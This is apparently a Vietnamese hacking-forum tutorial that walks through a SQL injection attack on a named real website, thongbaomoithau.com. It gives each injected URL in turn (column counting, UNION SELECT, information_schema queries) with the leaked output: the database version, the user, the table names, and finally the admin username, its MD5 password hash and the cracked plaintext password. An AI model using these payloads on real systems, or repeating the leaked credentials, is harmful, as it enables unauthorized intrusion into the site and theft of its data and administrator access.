[TUT] sqli thongbaomoithau.com

[Admin]

Chào anh em BYG mình là Notes. Mấy bữa trước mình đã làm cái tut sql dạng thông thường và error base hôm nay mình làm thêm 1 cái tut nữa về html biến dạng
site lỗi :http://thongbaomoithau.com/
link lỗi :http://thongbaomoithau.com/thong-bao-moi-thau-15484'.html
bắt đầu nhé

http://thongbaomoithau.com/thong-bao-moi-thau-15484'.html

--> lỗi

http://thongbaomoithau.com/thong-bao-moi-thau-15484 order by 1-- -.html

--> bình thường

http://thongbaomoithau.com/thong-bao-moi-thau-15484 order by 11-- -.html

--> lỗi
vậy chúng ta column lỗi cần tìm là 10 chúng ta bắt đầu union select nhé

http://thongbaomoithau.com/thong-bao-moi-thau-15484 UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -.html

không thấy hiện tượng hay lỗi của column nào thử thêm dâu '-' xem sao

http://thongbaomoithau.com/thong-bao-moi-thau--15484 UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -.html

vẫn không thấy gì nhỉ nhưng nếu chú ý một tý thì các bạn sẽ thấy số 7 bị lỗi ngay chỗ title ak =)) vậy ta bắt đâu get được rồi
get version ,user ,database

http://thongbaomoithau.com/thong-bao-moi-thau--15484 UNION SELECT 1,2,3,4,5,6,group_concat(version(),0x7c,user(),0x7c,database()),8,9,10-- -.html

5.5.23-log|moithau_admin@localhost|moithau_news
tiếp đến là get table_name

http://thongbaomoithau.com/thong-bao-moi-thau--15484 UNION SELECT 1,2,3,4,5,6,group_concat(table_name),8,9,10 from information_schema.tables where table_schema=database()-- -.html

articles,articles_info,ban_group,ban_source,categories,categories_multi,comments,linhvuc,linhvuc_multi,mpi_kehoachdauthau,mpi_moisotuyen,mpi_thongbaomoithau,newsletter,nguon_nhandan,poll,poll_ip,poll_result,properties,rating,session,session_detail,styles,sub_categories,sub_linhvuc,time_limit,topmenu,users,visitors
get column

http://thongbaomoithau.com/thong-bao-moi-thau--15484 UNION SELECT 1,2,3,4,5,6,group_concat(column_name),8,9,10 from information_schema.columns where table_schema=database() and table_name=0x7573657273-- -.html

get data
id,username,password,root,allowed

http://thongbaomoithau.com/thong-bao-moi-thau--15484 UNION SELECT 1,2,3,4,5,6,group_concat(username,0x7c,password),8,9,10 from users-- -.html

admin|fe743d8d97aa7dfc6c93ccdc2e749513
và cuối cùng ta được admin|fe743d8d97aa7dfc6c93ccdc2e749513 khi md5 ra thì pas là 1234568
---> admin/1234568
end tut
TUT by Notes.

Thanks nào............

 

[pro89]

admin ơi. tăng onlline nhé. Bắt đầu